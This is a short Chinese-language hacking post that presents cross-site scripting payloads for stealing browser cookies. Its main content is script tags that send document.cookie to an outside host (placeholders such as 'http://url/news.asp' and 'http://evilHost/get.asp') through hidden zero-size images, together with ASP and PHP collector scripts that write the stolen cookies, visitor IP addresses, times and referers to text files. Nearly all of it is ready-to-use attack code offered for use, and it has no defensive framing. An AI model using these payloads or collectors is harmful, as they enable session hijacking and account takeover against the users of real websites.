<script>document.write(‘<img src=”http://url/news.asp?msg=’+document.cookie+'” width=0 height=0 border=0 />’);</script>
news.asp代码:
<%
msg=Request.ServerVariables(“QUERY_STRING”)
testfile=Server.MapPath(“cook.txt”)
set fs=server.CreateObject(“scripting.filesystemobject”)
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.Writeline(“”&msg& “”)
thisfile.close
set fs = nothing
%>
PHP版代码:
<?php
$cookie = $_GET[‘c’];
$ip = getenv (‘REMOTE_ADDR’);
$time=date(“j F, Y, g:i a”);
$referer=getenv (‘HTTP_REFERER’);
$fp = fopen(‘cook.txt’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.'<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$time. ‘<br> Referer: ‘.$referer.'<br><br><br>’);
fclose($fp);
?>
————————————————————————————————————–
cookie窃取是最常见的跨站攻击之一,不管是用img,iframe方式,还是基于入库型或非入库的XSS,整个操作只需要带Cookie浏览器请求了某个的url即可完成。
本人偏爱Image:
<script>
img = new Image(); img.src = “http://evilHost/get.asp?cookie=”+document.cookie;img.width=0;img.height=0
</script>
盗cookie脚本:
还是一个比较简单的程序,经过一点完善,在获取Cookie同时也记录的时间和IP,比较智能化与人性化,务求达到一个更好的用户体验>”<,呵呵!
get.asp code:
<%
dim getcookie
dim mytime
dim str
getcookie=Request.QueryString
getip=Request.ServerVariables(“REMOTE_ADDR”)
mytime=now()
set fs=server.CreateObject(“Scripting.FileSystemObject”)
set file=fs.OpenTextFile(server.MapPath(“cookie.txt”),8,True)
str=”<-bof||”& mytime & “||” &getip & “||” & getcookie & “||eof->”
file.writeline(str)
file.close
set file=nothing
set fs=nothing
response.write “haha”
response.end
%>
参考链接:http://hi.baidu.com/_hacker__/item/897dabfa709bd34a922af213